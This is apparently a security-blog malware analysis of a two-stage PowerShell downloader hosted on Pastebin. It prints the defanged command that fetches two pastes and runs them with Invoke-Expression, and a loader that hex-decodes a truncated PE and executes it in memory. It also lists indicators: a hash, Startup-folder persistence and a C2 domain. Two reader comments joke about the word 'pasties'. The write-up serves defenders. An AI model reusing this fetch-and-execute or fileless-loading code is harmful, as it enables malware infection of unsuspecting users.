In politic, there is a strategy which says “divide and conquer”. It’s also true for some pieces of malware that spread their malicious code amongst multiple sources. One of our readers shared a sample of Powershell code found on Pastebin that applies exactly this technique. Thanks to him! Here is the complete Powershell command line (beautified for easy read) powershell.exe -command $request = [System.Net.WebRequest]::Create('hxxps://pastebin[.]com/raw/mVjViriF’); $request.Method="Get”; $response = $request.GetResponse(); $requestStream = $response.GetResponseStream(); $readStream = New-Object System.IO.StreamReader $requestStream; $data=$readStream.ReadToEnd(); $rrequest = [System.Net.WebRequest]::Create('hxxps://pastebin[.]com/raw/g3KQyPSA’); $rrequest.Method="Get”; $rresponse = $rrequest.GetResponse(); $rrequestStream = $rresponse.GetResponseStream(); $rreadStream = New-Object System.IO.StreamReader $rrequestStream; $ddata=$rreadStream.ReadToEnd(); iex($data+$ddata) The code is pretty easy to understand: It grabs the content of 2 pasties from pastebin.com, concatenates them and executes them through iex(), an alias for Invoke-Expression(). So, we can expect these pasties to contain more Powershell code. Indeed, here is the content of the concatenated data: function HexToBin([string]$s) { $return = @() for ($i = 0; $i -lt $s.Length ; $i += 2) { $return += [Byte]::Parse($s.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber) } Write-Output $return } $Str = ‘4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000 000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E2044 4F53206D6F64652E0D0D0A2400000000000000504500004C0103004050B35B0000000000000000E00002010B010800007E0100000A0000000 00000CE9C010000200000000000000000400000200000000200000400000000000000040000000000000000E0010000020000000000000200 40850000100000100000000010000010000000000000100000000000000000000000789C01005300000000A00100000800000000000000000 000000000000000000000C001000C000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000D47C01000020000 [stuff deleted] 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009001000C000000D 03C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'; $Str = $Str.replace("0","0"); [byte[]]$Data = HexToBin($str); $asm = [System.Reflection.Assembly]::Load($Data); $asm.EntryPoint.invoke($null,$null); write-host "Can you help me"; [void][System.Console]::ReadKey($true); This piece of code decodes the hex-encoded $str variable into $data using the HexToBin() function and executes it. You can see the beginning of the string ‘0x4D 0x5A 0x90’ which indicates that it’s a PE file. The way it is executed is interesting. It uses the System.Reflection.Assembly[1] class to load the code and execute it from memory (file less Powershell) The PE sample has the following SHA256 hash: 30db9979df050b966c8d89e0f76377b618145133b54662f8fa65dbce02f8c4b6.exe. It was unknown on VT yesterday but today it was uploaded from Denmark and reached already a score of 24/63[2]. It adds persistence by creating a .lnk file into %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ pointing to a copy of itself stored in %TEMP%. It tries to communicate with a C2 (testhoward[.]mysecondarydns[.]com) via HTTPS. [1] https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly?view=netframework-4.7.2 Xavier Mertens (@xme) |
Xme 686 Posts ISC Handler Nov 22nd 2018 |
Thread locked Subscribe |
Nov 22nd 2018 3 years ago |
And NOW I'm hungry, with all this talk of pasties!
https://en.wikipedia.org/wiki/Pasty |
Anonymous |
Quote |
Nov 22nd 2018 3 years ago |
X - very interesting article. But all that is just secondary to your use of the term "pasties". Translated from British, its a pastry. BUT the most overwhelmingly common :'-) use is <rotfl> "nipple covers" 8-D. <lmao>. I suppose that you saw a huge spike in hits that day.
![]() |
Brett 19 Posts |
Quote |
Nov 28th 2018 3 years ago |
Sign Up for Free or Log In to start participating in the conversation!